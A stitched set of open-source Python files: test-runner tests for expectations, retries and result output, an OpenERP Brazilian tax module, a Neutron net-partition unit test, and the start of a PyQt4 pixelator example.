rout=(r'\[1/1\] pass_test.PassingTest.test_pass passed\n'
'1 test passed, 0 skipped, 0 failures.\n'
'Uploading the JSON results raised .*\n'))
def test_unexpected_skip(self):
files = {
'expectations.txt':
'# results: [ Pass ]\ncrbug.com/23456 skip_test.SkipSetup.test_notrun [ Pass ]\n',
'skip_test.py': SF_TEST_PY
}
_, out, _, _ = self.check(['-X', 'expectations.txt',
'skip_test.SkipSetup.test_notrun'],
files=files, ret=1, err='')
        self.assertIn('skip_test.SkipSetup.test_notrun was skipped unexpectedly',
                      out)
def test_retry_only_retry_on_failure_tests(self):
files = {'flaky_test.py': FLAKY_TEST_PY}
_, out, _, files = self.check(['--write-full-results-to',
'full_results.json',
'--retry-limit','6',
'--retry-only-retry-on-failure-tests'],
files=files, ret=1, err='')
self.assertIn('[1/1] flaky_test.FlakyTest.test_flaky failed unexpectedly:\n',
out)
self.assertNotIn('[1/1] flaky_test.FlakyTest.test_flaky passed\n',
out)
self.assertIn('0 tests passed, 0 skipped, 1 failure.\n', out)
results = json.loads(files['full_results.json'])
results = results['tests']['flaky_test']['FlakyTest']['test_flaky']
self.assertEqual(results['actual'],'FAIL')
self.assertEqual(results['expected'],'PASS')
self.assertIn('is_unexpected', results)
self.assertIn('is_regression', results)
def test_retryonfailure_test_fails(self):
files = {'fail_test.py': FAIL_TEST_PY,
'expectations.txt': d("""\
# tags: [ Foo ]
# tags: [ Bar ]
# results: [ RetryOnFailure ]
crbug.com/12345 [ foo bar ] test_fail [ retryonfailure ]
""")}
_, out, _, files = self.check(['--write-full-results-to',
'full_results.json',
'-X', 'expectations.txt',
'-x', 'Foo',
'-x', 'Bar',
'--retry-limit', '3',
'--retry-only-retry-on-failure-tests',
'--test-name-prefix',
'fail_test.FailingTest.'],
files=files, ret=1, err='')
self.assertIn('[1/1] test_fail failed unexpectedly:\n',
out)
self.assertIn('0 tests passed, 0 skipped, 1 failure.\n', out)
results = json.loads(files['full_results.json'])
results = results['tests']['test_fail']
self.assertEqual(results['actual'],'FAIL FAIL FAIL FAIL')
self.assertEqual(results['expected'],'PASS')
self.assertIn('is_unexpected', results)
self.assertIn('is_regression', results)
def test_retryonfailure_test_passes(self):
files = {'flaky_test.py': FLAKY_TEST_PY,
'expectations.txt': d("""\
# tags: [ foo bar ]
# results: [ RetryOnFailure ]
crbug.com/12345 [ foo ] flaky_test.FlakyTest.test_flaky [ RetryOnFailure ]
""")}
_, out, _, files = self.check(['--write-full-results-to',
'full_results.json',
'-X', 'expectations.txt',
'-x', 'foo',
'--retry-limit','6',
'--retry-only-retry-on-failure-tests'],
files=files, ret=0, err='')
self.assertIn('[1/1] flaky_test.FlakyTest.test_flaky failed unexpectedly:\n',
out)
self.assertIn('[1/1] flaky_test.FlakyTest.test_flaky passed\n',
out)
self.assertIn('1 test passed, 0 skipped, 0 failures.\n', out)
results = json.loads(files['full_results.json'])
results = results['tests']['flaky_test']['FlakyTest']['test_flaky']
self.assertEqual(results['actual'],'FAIL FAIL FAIL PASS')
self.assertEqual(results['expected'],'PASS')
self.assertNotIn('is_unexpected', results)
self.assertNotIn('is_regression', results)
def test_retryonfailure_test_fails_no_regression(self):
files = {'fail_test.py': FAIL_TEST_PY,
'expectations.txt': d("""\
# tags: [ foo bar ]
# results: [ RetryOnFailure Failure ]
crbug.com/12345 [ foo ] fail_test.FailingTest.test_fail [ RetryOnFailure Failure ]
""")}
_, out, _, files = self.check(['--write-full-results-to',
'full_results.json',
'-X', 'expectations.txt',
'-x', 'foo',
'-x', 'bar',
'--retry-limit', '3',
'--retry-only-retry-on-failure-tests', '-vv'],
files=files, ret=0, err='')
self.assertIn('[1/1] fail_test.FailingTest.test_fail failed as expected:\n',
out)
self.assertIn('0 tests passed, 0 skipped, 1 failure.\n', out)
results = json.loads(files['full_results.json'])
test_results = results['tests']['fail_test']['FailingTest']['test_fail']
self.assertEqual(test_results['actual'],'FAIL FAIL FAIL FAIL')
self.assertEqual(test_results['expected'],'FAIL')
self.assertEqual(results['metadata']['expectations_files'],
['expectations.txt'])
self.assertNotIn('is_unexpected', results)
self.assertNotIn('is_regression', results)
self.assertEqual(results['metadata']['tags'], ['foo', 'bar'])
def test_skip_test_with_expectations_file_skip_expectation(self):
files = {'fail_test.py': FAIL_TEST_PY,
'expectations.txt': d("""\
# tags: [ foo bar
# bat
# ]
# results: [ skip ]
crbug.com/12345 [ foo ] fail_test.FailingTest.test_fail [ Skip ]
""")}
_, out, _, files = self.check(['--write-full-results-to',
'full_results.json',
'-X', 'expectations.txt',
'-x', 'foo'],
files=files, ret=0, err='')
self.assertIn('[1/1] fail_test.FailingTest.test_fail was skipped\n',
out)
self.assertIn('0 tests passed, 1 skipped, 0 failures.\n', out)
results = json.loads(files['full_results.json'])
results = results['tests']['fail_test']['FailingTest']['test_fail']
self.assertEqual(results['actual'],'SKIP')
self.assertEqual(results['expected'],'SKIP')
self.assertNotIn('is_unexpected', results)
self.assertNotIn('is_regression', results)
def test_skip_test_with_expectations_file_skip_with_cmd_args(self):
files = {'pass_test.py': PASS_TEST_PY,
'expectations.txt': d("""\
# tags: [ foo bar ]
# results: [ Pass ]
crbug.com/12345 [ foo ] pass_test.PassingTest.test_pass [ Pass ]
""")}
_, out, _, files = self.check(['--write-full-results-to',
'full_results.json',
'-X', 'expectations.txt',
'-x', 'foo',
'--skip', '*test_pass'],
files=files, ret=0, err='')
self.assertIn('[1/1] pass_test.PassingTest.test_pass was skipped\n',
out)
self.assertIn('0 tests passed, 1 skipped, 0 failures.\n', out)
results = json.loads(files['full_results.json'])
results = results['tests']['pass_test']['PassingTest']['test_pass']
self.assertEqual(results['actual'],'SKIP')
self.assertEqual(results['expected'],'SKIP')
self.assertNotIn('is_unexpected', results)
self.assertNotIn('is_regression', results)
def test_skip_test_no_expectations_file(self):
files = {'skip_test.py': SKIP_TEST_PY}
_, out, _, files = self.check(['--write-full-results-to',
'full_results.json'],
files=files, ret=0, err='')
self.assertIn('[1/1] skip_test.SkipTest.test_skip was skipped\n', out)
self.assertIn('0 tests passed, 1 skipped, 0 failures.\n', out)
results = json.loads(files['full_results.json'])
results = results['tests']['skip_test']['SkipTest']['test_skip']
self.assertEqual(results['actual'],'SKIP')
self.assertEqual(results['expected'],'SKIP')
self.assertNotIn('is_unexpected', results)
self.assertNotIn('is_regression', results)
def test_skip_test_no_expectations_file_cmd_args_skip(self):
files = PASS_TEST_FILES
_, out, _, files = self.check(['--write-full-results-to',
'full_results.json',
'--skip','*test_pass'],
files=files, ret=0, err='')
self.assertIn('[1/1] pass_test.PassingTest.test_pass was skipped\n',
out)
self.assertIn('0 tests passed, 1 skipped, 0 failures.\n', out)
results = json.loads(files['full_results.json'])
results = results['tests']['pass_test']['PassingTest']['test_pass']
self.assertEqual(results['actual'],'SKIP')
self.assertEqual(results['expected'],'SKIP')
self.assertNotIn('is_unexpected', results)
self.assertNotIn('is_regression', results)
def test_relative_paths_used_for_expectations_files_in_metadata(self):
test_expectations = (
'# tags: [ foo bar ]\n'
'# results: [ Failure ]\n'
'crbug.com/12345 [ foo ] test_dir.failing_test.FailingTest.test_fail '
'[ Failure ]\n')
_, out, _, files = self.check(
['--write-full-results-to', 'full_results.json', 'src/test_dir',
'-X', 'src/test_dir/test_expectations/test_expectations.txt',
'-x', 'foo', '--repository-absolute-path', 'src/'],
ret=0, err='', files={
'src/test_dir/failing_test.py': FAIL_TEST_PY,
('src/test_dir/test_expectations'
'/test_expectations.txt'): test_expectations,
'src/test_dir/__init__.py': ''
})
self.assertIn(
' test_dir.failing_test.FailingTest.test_fail failed', out)
results = json.loads(files['full_results.json'])
self.assertEqual(
['/'.join(['', '', 'test_dir', 'test_expectations', 'test_expectations.txt'])],
results['metadata']['expectations_files'])
def test_implement_test_name_prefix_exclusion_in_finished_test_output(self):
files = PASS_TEST_FILES
_, out, _, files = self.check(
['--write-full-results-to', 'full_results.json',
'--test-name-prefix', 'pass_test.PassingTest.'],
files=files, ret=0, err='')
self.assertIn('[1/1] test_pass passed\n', out)
def test_implement_test_name_prefix_exclusion_in_test_filter(self):
files = OUTPUT_TEST_FILES
_, out, _, files = self.check(
['--write-full-results-to', 'full_results.json',
'--test-name-prefix', 'output_test.',
'--test-filter', '*test_out'],
files=files, ret=0, err='')
results = json.loads(files['full_results.json'])
self.assertEqual(len(results['tests']), 1)
self.assertIn('[1/1] PassTest.test_out passed\n', out)
def test_implement_test_name_prefix_exclusion_in_expectations_files(self):
files = {'fail_test.py': FAIL_TEST_PY,
'expectations.txt': d("""\
# tags: [ foo bar ]
# results: [ Failure ]
crbug.com/12345 [ foo ] test_fail [ Failure ]
""")}
_, out, _, files = self.check(
['--write-full-results-to', 'full_results.json',
'--test-name-prefix', 'fail_test.FailingTest.',
'-X', 'expectations.txt', '-x', 'foo', '-vv'],
files=files, ret=0, err='')
self.assertIn('[1/1] test_fail failed as expected:\n', out)
def test_implement_test_name_prefix_exclusion_in_skip_glob(self):
files = {'fail_test.py': FAIL_TEST_PY}
_, out, _, files = self.check(
['--test-name-prefix', 'fail_test.FailingTest.','--skip',
'test_*'], files=files, ret=0, err='')
self.assertIn('0 tests passed, 1 skipped, 0 failures.\n', out)
def test_implement_test_name_prefix_exclusion_in_json_results(self):
files = {'fail_test.py': FAIL_TEST_PY}
_, out, _, files = self.check(
['--test-name-prefix', 'fail_test.FailingTest.',
'--write-full-results-to', 'full_results.json'],
files=files, ret=1, err='')
results = json.loads(files['full_results.json'])
self.assertEqual(results['tests']['test_fail']['actual'], 'FAIL')
# also test if the test_name_prefix key value pair is in the JSON results
self.assertEqual(results['metadata']['test_name_prefix'], 'fail_test.FailingTest.')
def test_implement_test_name_prefix_exclusion_in_trace_results(self):
files = {'fail_test.py': FAIL_TEST_PY}
_, out, _, files = self.check(
['--test-name-prefix', 'fail_test.FailingTest.',
'--write-trace-to', 'full_trace.json'],
files=files, ret=1, err='')
trace = json.loads(files['full_trace.json'])
self.assertEqual(trace['traceEvents'][0]['name'], 'test_fail')
# also test if the test_name_prefix key value pair is in the JSON results
self.assertEqual(
trace['otherData']['test_name_prefix'], 'fail_test.FailingTest.')
def test_test_name_prefix_is_optional_field_in_json_results(self):
files = {'fail_test.py': FAIL_TEST_PY}
_, out, _, files = self.check(
['--write-full-results-to', 'full_results.json'],
files=files, ret=1, err='')
results = json.loads(files['full_results.json'])
self.assertNotIn('test_name_prefix', results)
def test_implement_test_name_prefix_exclusion_for_tests_args(self):
files = {'fail_test.py': FAIL_TEST_PY}
_, out, _, files = self.check(
['test_fail',
'--write-full-results-to', 'full_results.json',
'--test-name-prefix', 'fail_test.FailingTest.'],
files=files, ret=1, err='')
self.assertIn('0 tests passed, 0 skipped, 1 failure.', out)
def test_implement_test_name_prefix_exclusion_for_file_list_arg(self):
test_list = ('test_fail\n')
files = {'fail_test.py': FAIL_TEST_PY,
'test_list.txt': test_list}
_, out, _, files = self.check(
['--write-full-results-to', 'full_results.json',
'--test-name-prefix', 'fail_test.FailingTest.',
'-f', 'test_list.txt'],
files=files, ret=1, err='')
self.assertIn('0 tests passed, 0 skipped, 1 failure.', out)
def test_artifacts_added_for_retries(self):
files = {'artifacts_test.py': ARTIFACTS_TEST_PY}
_, out, err, files = self.check(
['--test-name-prefix', 'artifacts_test.ArtifactTest.',
'--write-full-results-to', 'full_results.json', '--retry-limit=1'],
files=files, ret=1, err='')
results = json.loads(files['full_results.json'])
artifacts = results['tests']['test_produce_artifact_for_retries']['artifacts']
self.assertEqual(artifacts['artifact_name'], [
os.path.join('test_produce_artifact_for_retries', 'test.txt'),
os.path.join('test_produce_artifact_for_retries',
'retry_1', 'test.txt')])
self.assertIn(
os.path.join('artifacts', 'test_produce_artifact_for_retries',
'test.txt'), files)
self.assertIn(
os.path.join('artifacts', 'test_produce_artifact_for_retries',
'retry_1', 'test.txt'), files)
def test_matches_partial_filter(self):
_, out, _, files = self.check(
['--test-name-prefix', 'output_test.',
'--partial-match-filter', 'PassTest'],
files=OUTPUT_TEST_FILES, ret=0, err='')
self.assertIn('2 tests passed, 0 skipped, 0 failures.',out)
def test_test_prefix_exclusion_in_partial_filter_match(self):
_, out, _, files = self.check(
['--test-name-prefix', 'output_test.',
'--partial-match-filter', 'output_test.'],
files=OUTPUT_TEST_FILES, ret=0, err='')
self.assertIn('0 tests passed, 0 skipped, 0 failures.',out)
def test_implement_test_name_prefix_exclusion_in_test_started_output(self):
files = {'fail_test.py': FAIL_TEST_PY}
_, out, _, files = self.check(
['--test-name-prefix', 'fail_test.FailingTest.', '-vvv',
'--overwrite'],
files=files, ret=1, err='')
self.assertIn('[0/1] test_fail queued\n', out)
self.assertIn('[0/1] test_fail\n', out)
def test_implement_test_name_prefix_exclusion_in_list_only_arg(self):
files = {'fail_test.py': FAIL_TEST_PY}
_, out, _, files = self.check(
['--test-name-prefix', 'fail_test.FailingTest.', '--list-only'],
files=files, ret=0, err='')
self.assertIn('test_fail', out)
def test_verbose_2(self):
self.check(['-vv', '-j', '1', 'output_test.PassTest'],
files=OUTPUT_TEST_FILES, ret=0,
out=d("""\
[1/2] output_test.PassTest.test_err passed:
hello on stderr
[2/2] output_test.PassTest.test_out passed:
hello on stdout
2 tests passed, 0 skipped, 0 failures.
"""), err='')
def test_verbose_3(self):
self.check(['-vvv', '-j', '1', 'output_test.PassTest'],
files=OUTPUT_TEST_FILES, ret=0,
out=d("""\
[0/2] output_test.PassTest.test_err queued
[1/2] output_test.PassTest.test_err passed:
hello on stderr
[1/2] output_test.PassTest.test_out queued
[2/2] output_test.PassTest.test_out passed:
hello on stdout
2 tests passed, 0 skipped, 0 failures.
"""), err='')
def test_version(self):
self.check('--version', ret=0, out=(VERSION + '\n'))
def test_write_full_results_to(self):
_, _, _, files = self.check(['--write-full-results-to',
'results.json'], files=PASS_TEST_FILES)
self.assertIn('results.json', files)
results = json.loads(files['results.json'])
self.assertEqual(results['interrupted'], False)
self.assertEqual(results['path_delimiter'], '.')
# The time it takes to run the test varies, so we test that
# we got a single entry greater than zero, but then delete it from
# the result so we can do an exact match on the rest of the trie.
result = results['tests']['pass_test']['PassingTest']['test_pass']
self.assertEqual(len(result['times']), 1)
self.assertGreater(result['times'][0], 0)
result.pop('times')
self.assertEqual({u'pass_test': {
u'PassingTest': {
u'test_pass': {
u'actual': u'PASS',
u'expected': u'PASS',
}
}
}},
results['tests'])
def test_write_trace_to(self):
_, _, _, files = self.check(['--write-trace-to', 'trace.json'],
files=PASS_TEST_FILES)
self.assertIn('trace.json', files)
trace_obj = json.loads(files['trace.json'])
self.assertEqual(trace_obj['otherData'], {})
self.assertEqual(len(trace_obj['traceEvents']), 5)
event = trace_obj['traceEvents'][0]
self.assertEqual(event['name'], 'pass_test.PassingTest.test_pass')
self.assertEqual(event['ph'], 'X')
self.assertEqual(event['tid'], 1)
self.assertEqual(event['args']['expected'], ['PASS'])
self.assertEqual(event['args']['actual'], 'PASS')
def test_expected_failure_does_not_get_retried(self):
files = {'fail_test.py': FAIL_TEST_PY,
'expectations.txt': d("""\
# tags: [ foo bar
# bat
# ]
# results: [ Failure ]
crbug.com/12345 [ foo ] fail_test.FailingTest.test_fail [ Failure ]
""")}
_, out, _, files = self.check(['--write-full-results-to',
'full_results.json',
'--retry-limit','3',
'-X', 'expectations.txt',
'-x', 'foo'],
files=files, ret=0, err='')
results = json.loads(files['full_results.json'])
result = results['tests']['fail_test']['FailingTest']['test_fail']
self.assertIn('test_fail failed as expected', out)
self.assertIn('0 tests passed, 0 skipped, 1 failure.', out)
self.assertNotIn('Retrying failed tests', out)
self.assertEqual(result['expected'], 'FAIL')
self.assertEqual(result['actual'], 'FAIL')
self.assertNotIn('is_unexpected', result)
class TestMain(TestCli):
prog = []
def make_host(self):
return Host()
def call(self, host, argv, stdin, env):
stdin = unicode(stdin)
host.stdin = io.StringIO(stdin)
if env:
host.getenv = env.get
host.capture_output()
orig_sys_path = sys.path[:]
orig_sys_modules = list(sys.modules.keys())
try:
ret = main(argv + ['-j', '1'], host)
finally:
out, err = host.restore_output()
modules_to_unload = []
for k in sys.modules:
if k not in orig_sys_modules:
modules_to_unload.append(k)
for k in modules_to_unload:
del sys.modules[k]
sys.path = orig_sys_path
return ret, out, err
def test_debugger(self):
# TODO: this test seems to hang under coverage.
pass
|
vrenaville/OCB | refs/heads/8.0 | addons/l10n_br/account.py | 340 | # -*- encoding: utf-8 -*-
#################################################################################
# #
# Copyright (C) 2009 Renato Lima - Akretion #
# #
#This program is free software: you can redistribute it and/or modify #
#it under the terms of the GNU Affero General Public License as published by #
#the Free Software Foundation, either version 3 of the License, or #
#(at your option) any later version. #
# #
#This program is distributed in the hope that it will be useful, #
#but WITHOUT ANY WARRANTY; without even the implied warranty of #
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
#GNU General Public License for more details. #
# #
#You should have received a copy of the GNU General Public License #
#along with this program. If not, see <http://www.gnu.org/licenses/>. #
#################################################################################
import openerp
from openerp.osv import fields, osv
TAX_CODE_COLUMNS = {
'domain':fields.char('Domain',
help="This field is only used if you develop your own module allowing developers to create specific taxes in a custom domain."),
    'tax_discount': fields.boolean('Discount this Tax in Price',
        help="Mark it for (ICMS, PIS, COFINS and other taxes included)."),
}
TAX_DEFAULTS = {
'base_reduction': 0,
'amount_mva': 0,
}
class account_tax_code_template(osv.osv):
""" Add fields used to define some brazilian taxes """
_inherit = 'account.tax.code.template'
_columns = TAX_CODE_COLUMNS
def generate_tax_code(self, cr, uid, tax_code_root_id, company_id,
context=None):
"""This function generates the tax codes from the templates of tax
code that are children of the given one passed in argument. Then it
        returns a dictionary with the mapping between the templates and the
real objects.
:param tax_code_root_id: id of the root of all the tax code templates
to process.
:param company_id: id of the company the wizard is running for
        :returns: dictionary with the mapping between the templates and the
real objects.
:rtype: dict
"""
obj_tax_code_template = self.pool.get('account.tax.code.template')
obj_tax_code = self.pool.get('account.tax.code')
tax_code_template_ref = {}
company = self.pool.get('res.company').browse(cr, uid, company_id, context=context)
#find all the children of the tax_code_root_id
children_tax_code_template = tax_code_root_id and obj_tax_code_template.search(cr, uid, [('parent_id','child_of',[tax_code_root_id])], order='id') or []
for tax_code_template in obj_tax_code_template.browse(cr, uid, children_tax_code_template, context=context):
parent_id = tax_code_template.parent_id and ((tax_code_template.parent_id.id in tax_code_template_ref) and tax_code_template_ref[tax_code_template.parent_id.id]) or False
vals = {
'name': (tax_code_root_id == tax_code_template.id) and company.name or tax_code_template.name,
'code': tax_code_template.code,
'info': tax_code_template.info,
'parent_id': parent_id,
'company_id': company_id,
'sign': tax_code_template.sign,
'domain': tax_code_template.domain,
'tax_discount': tax_code_template.tax_discount,
}
#check if this tax code already exists
rec_list = obj_tax_code.search(cr, uid, [('name', '=', vals['name']),
('parent_id','=',parent_id),
('code', '=', vals['code']),
('company_id', '=', vals['company_id'])], context=context)
if not rec_list:
#if not yet, create it
new_tax_code = obj_tax_code.create(cr, uid, vals)
#recording the new tax code to do the mapping
tax_code_template_ref[tax_code_template.id] = new_tax_code
return tax_code_template_ref
class account_tax_code(osv.osv):
""" Add fields used to define some brazilian taxes """
_inherit = 'account.tax.code'
_columns = TAX_CODE_COLUMNS
def get_precision_tax():
def change_digit_tax(cr):
decimal_precision = openerp.registry(cr.dbname)['decimal.precision']
res = decimal_precision.precision_get(cr, 1, 'Account')
return (16, res+2)
return change_digit_tax
class account_tax_template(osv.osv):
""" Add fields used to define some brazilian taxes """
_inherit = 'account.tax.template'
_columns = {
        'tax_discount': fields.boolean('Discount this Tax in Price',
            help="Mark it for (ICMS, PIS, etc.)."),
        'base_reduction': fields.float('Reduction', required=True,
            digits_compute=get_precision_tax(),
            help="A decimal percentage between 0 and 1."),
        'amount_mva': fields.float('MVA Percent', required=True,
            digits_compute=get_precision_tax(),
            help="A decimal percentage between 0 and 1."),
'type': fields.selection([('percent','Percentage'),
('fixed','Fixed Amount'),
('none','None'),
('code','Python Code'),
('balance','Balance'),
('quantity','Quantity')], 'Tax Type', required=True,
help="The computation method for the tax amount."),
}
_defaults = TAX_DEFAULTS
def _generate_tax(self, cr, uid, tax_templates, tax_code_template_ref, company_id, context=None):
"""
        This method generates taxes from templates.
        :param tax_templates: list of browse records of the tax templates to process
:param tax_code_template_ref: Taxcode templates reference.
:param company_id: id of the company the wizard is running for
:returns:
{
'tax_template_to_tax': mapping between tax template and the newly generated taxes corresponding,
'account_dict': dictionary containing a to-do list with all the accounts to assign on new taxes
}
"""
result = super(account_tax_template, self)._generate_tax(cr, uid,
tax_templates,
tax_code_template_ref,
company_id,
context)
tax_templates = self.browse(cr, uid, result['tax_template_to_tax'].keys(), context)
obj_acc_tax = self.pool.get('account.tax')
for tax_template in tax_templates:
if tax_template.tax_code_id:
obj_acc_tax.write(cr, uid, result['tax_template_to_tax'][tax_template.id], {'domain': tax_template.tax_code_id.domain,
'tax_discount': tax_template.tax_code_id.tax_discount})
return result
def onchange_tax_code_id(self, cr, uid, ids, tax_code_id, context=None):
result = {'value': {}}
if not tax_code_id:
return result
obj_tax_code = self.pool.get('account.tax.code.template').browse(cr, uid, tax_code_id)
if obj_tax_code:
result['value']['tax_discount'] = obj_tax_code.tax_discount
result['value']['domain'] = obj_tax_code.domain
return result
class account_tax(osv.osv):
""" Add fields used to define some brazilian taxes """
_inherit = 'account.tax'
_columns = {
        'tax_discount': fields.boolean('Discount this Tax in Price',
            help="Mark it for (ICMS, PIS, etc.)."),
        'base_reduction': fields.float('Reduction', required=True,
            digits_compute=get_precision_tax(),
            help="A decimal percentage between 0 and 1."),
        'amount_mva': fields.float('MVA Percent', required=True,
            digits_compute=get_precision_tax(),
            help="A decimal percentage between 0 and 1."),
'type': fields.selection([('percent','Percentage'),
('fixed','Fixed Amount'),
('none','None'),
('code','Python Code'),
('balance','Balance'),
('quantity','Quantity')], 'Tax Type', required=True,
help="The computation method for the tax amount."),
}
_defaults = TAX_DEFAULTS
def onchange_tax_code_id(self, cr, uid, ids, tax_code_id, context=None):
result = {'value': {}}
if not tax_code_id:
return result
obj_tax_code = self.pool.get('account.tax.code').browse(cr, uid, tax_code_id)
if obj_tax_code:
result['value']['tax_discount'] = obj_tax_code.tax_discount
result['value']['domain'] = obj_tax_code.domain
return result
|
uni2u/neutron | refs/heads/master | neutron/tests/unit/nuage/test_netpartition.py | 14 | # Copyright 2014 Alcatel-Lucent USA Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import uuid
import webob.exc
from neutron import manager
from neutron.plugins.nuage.extensions import netpartition as netpart_ext
from neutron.tests.unit.nuage import test_nuage_plugin
from neutron.tests.unit import test_extensions
class NetPartitionTestExtensionManager(object):
def get_resources(self):
return netpart_ext.Netpartition.get_resources()
def get_actions(self):
return []
def get_request_extensions(self):
return []
class NetPartitionTestCase(test_nuage_plugin.NuagePluginV2TestCase):
def setUp(self):
ext_mgr = NetPartitionTestExtensionManager()
super(NetPartitionTestCase, self).setUp()
self.ext_api = test_extensions.setup_extensions_middleware(ext_mgr)
def _make_netpartition(self, fmt, name):
data = {
'net_partition': {
'name': name,
'tenant_id': uuid.uuid4()
}
}
netpart_req = self.new_create_request('net-partitions', data, fmt)
resp = netpart_req.get_response(self.ext_api)
if resp.status_int >= webob.exc.HTTPClientError.code:
raise webob.exc.HTTPClientError(code=resp.status_int)
return self.deserialize(fmt, resp)
def _del_netpartition(self, id):
self._delete('net-partitions', id)
@contextlib.contextmanager
def netpartition(self, name='netpartition1',
do_delete=True,
fmt=None,
**kwargs):
netpart = self._make_netpartition(fmt or self.fmt, name)
yield netpart
if do_delete:
self._del_netpartition(netpart['net_partition']['id'])
def test_create_netpartition(self):
name = 'netpart1'
keys = [('name', name)]
with self.netpartition(name=name) as netpart:
for k, v in keys:
self.assertEqual(netpart['net_partition'][k], v)
def test_delete_netpartition(self):
name = 'netpart1'
netpart = self._make_netpartition(self.fmt, name)
req = self.new_delete_request('net-partitions',
netpart['net_partition']['id'])
res = req.get_response(self.ext_api)
self.assertEqual(res.status_int, webob.exc.HTTPNoContent.code)
def test_show_netpartition(self):
with self.netpartition(name='netpart1') as npart:
req = self.new_show_request('net-partitions',
npart['net_partition']['id'])
res = self.deserialize(self.fmt, req.get_response(self.ext_api))
self.assertEqual(res['net_partition']['name'],
npart['net_partition']['name'])
def test_create_existing_default_netpartition(self):
name = 'default_test_np'
netpart1 = self._make_netpartition(self.fmt, name)
nuage_plugin = manager.NeutronManager.get_plugin()
netpart2 = nuage_plugin._create_default_net_partition(name)
self.assertEqual(netpart1['net_partition']['name'],
netpart2['name'])
|
AlexDoul/PyQt4 | refs/heads/master | examples/itemviews/pixelator/pixelator.py | 2 | #!/usr/bin/env python
#############################################################################
##
## Copyright (C) 2010 Riverbank Computing Limited.
## Copyright (C) 2010 Nokia Corporation and/or its subsidiary(-ies).
## All rights reserved.
##
## This file is part of the examples of PyQt.
##
## $QT_BEGIN_LICENSE:BSD$
## You may use this file under the terms of the BSD license as follows:
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are
## met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in
## the documentation and/or other materials provided with the
## distribution.
## * Neither the name of Nokia Corporation and its Subsidiary(-ies) nor
## the names of its contributors may be used to endorse or promote
## products derived from this software without specific prior written
## permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
## $QT_END_LICENSE$
##
#############################################################################
# These are only needed for Python v2 but are harmless for Python v3.
import sip
sip.setapi('QString', 2)
sip.setapi('QVariant', 2)
from PyQt4 import QtCore, QtGui
try:
import pixelator_rc3
except ImportError:
import pixelator_rc2
ItemSize = 256
class PixelDelegate(QtGui.QAbstractItemDelegate):
def __init__(self, parent=None):
super(PixelDelegate, self).__init__(parent)
self.pixelSize = 12
def paint(self, painter, option, index):
if option.state & QtGui.QStyle.State_Selected:
painter.fillRect(option.rect, option.palette.highlight())
size = min(option.rect.width(), option.rect.height())
brightness = index.model().data(index, QtCore.Qt.DisplayRole)
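        # Darker pixels (lower gray values) produce larger circles; pure white yields radius 0.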
radius = (size/2.0) - (brightness/255.0 * size/2.0)
if radius == 0.0:
return
painter.save()
painter.setRenderHint(QtGui.QPainter.Antialiasing)
painter.setPen(QtCore.Qt.NoPen)
if option.state & QtGui.QStyle.State_Selected:
painter.setBrush(option.palette.highlightedText())
else:
painter.setBrush(QtGui.QBrush(QtCore.Qt.black))
painter.drawEllipse(QtCore.QRectF(
option.rect.x() + option.rect.width()/2 - radius,
option.rect.y() + option.rect.height()/2 - radius,
2*radius, 2*radius))
painter.restore()
def sizeHint(self, option, index):
return QtCore.QSize(self.pixelSize, self.pixelSize)
def setPixelSize(self, size):
self.pixelSize = size
class ImageModel(QtCore.QAbstractTableModel):
def __init__(self, parent=None):
super(ImageModel, self).__init__(parent)
self.modelImage = QtGui.QImage()
def setImage(self, image):
self.modelImage = QtGui.QImage(image)
self.reset()
def rowCount(self, parent):
return self.modelImage.height()
def columnCount(self, parent):
return self.modelImage.width()
def data(self, index, role):
if not index.isValid() or role != QtCore.Qt.DisplayRole:
return None
return QtGui.qGray(self.modelImage.pixel(index.column(), index.row()))
def headerData(self, section, orientation, role):
if role == QtCore.Qt.SizeHintRole:
return QtCore.QSize(1, 1)
return None
class MainWindow(QtGui.QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
self.currentPath = QtCore.QDir.homePath()
self.model = ImageModel(self)
centralWidget = QtGui.QWidget()
self.view = QtGui.QTableView()
self.view.setShowGrid(False)
self.view.horizontalHeader().hide()
self.view.verticalHeader().hide()
self.view.horizontalHeader().setMinimumSectionSize(1)
self.view.verticalHeader().setMinimumSectionSize(1)
self.view.setModel(self.model)
delegate = PixelDelegate(self)
self.view.setItemDelegate(delegate)
pixelSizeLabel = QtGui.QLabel("Pixel size:")
pixelSizeSpinBox = QtGui.QSpinBox()
pixelSizeSpinBox.setMinimum(4)
pixelSizeSpinBox.setMaximum(32)
pixelSizeSpinBox.setValue(12)
fileMenu = QtGui.QMenu("&File", self)
openAction = fileMenu.addAction("&Open...")
openAction.setShortcut("Ctrl+O")
self.printAction = fileMenu.addAction("&Print...")
self.printAction.setEnabled(False)
self.printAction.setShortcut("Ctrl+P")
quitAction = fileMenu.addAction("E&xit")
quitAction.setShortcut("Ctrl+Q")
